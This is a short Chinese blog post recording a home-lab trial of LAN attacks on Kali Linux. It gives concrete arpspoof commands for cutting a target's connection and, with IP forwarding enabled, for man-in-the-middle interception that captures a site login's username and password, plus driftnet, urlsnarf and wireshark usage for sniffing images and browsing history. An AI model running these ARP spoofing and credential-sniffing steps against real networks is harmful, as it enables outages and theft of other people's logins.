美文网首页
2018-11-09 kali内网嗅探小试记录

2018-11-09 kali内网嗅探小试记录

作者: 昨天今天下雨天1 | 来源:发表于2019-06-03 13:13 被阅读0次

    断网攻击:

    首先我们需要知道攻击的目标ip及网关和我们攻击者的ip及网卡

    本例中,目标IP:192.168.147.130 目标网关:192.168.147.2

    本机IP:192.168.147.132 本机网卡:eth0

    攻击前,先查看目标主机是否能联通互联网。经查看:可以

    打开中断,输入以下命令进行断网攻击

    arpspoof -i 本机网卡 -t 目标ip 目标网关

    本例中命令为:arpspoof -i eth0 -t 192.168.147.130 192.168.147.2

    攻击成功!

    欺骗攻击(密码劫持)

    同样我们也需要知道目标IP、目标网关、本机网卡、本机IP。

    此例依旧使用上述目标及本机

    打开终端输入命令:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    使目标IP不断网

    cat /proc/sys/net/ipv4/ip_forward

    检查上述命令是否被执行,若返回1则说明命令已被执行

    arpspoof -i 本机网卡 -t 目标IP 目标网关

    在本例中,命令应为:

    arpspoof -i eth0 -t 192.168.147.130 192.168.147.2

    另起终端,用来接收劫持(盗取的信息)

    随意登陆一个网站,可发现用户名及密码已被劫持。

    可以看到用户名为123,而密码为一串编码,这是因为网站对密码加密的缘故,可通过解密手段对编码进行解码

    主要参数:

    -b               捕获到新的图片时发出嘟嘟声

    -i  interface     选择监听接口

    -f  file   读取一个指定pcap数据包中的图片

    -p  不让所监听的接口使用混杂模式

    -a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

    -m number 指定保存图片数的数目

    -d directory  指定保存图片的路径

    -x prefix  指定保存图片的前缀名

    使用举例:

    1.实时监听: driftnet -i wlan0

    2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

    再打开一个终端,输入urlsnarf -i wlan0 监听浏览过的网页日志,等待获取

    再打开一个终端,输入wireshark ,进行抓包

    相关文章

      网友评论

          本文标题:2018-11-09 kali内网嗅探小试记录

          本文链接:https://www.haomeiwen.com/subject/cynnxqtx.html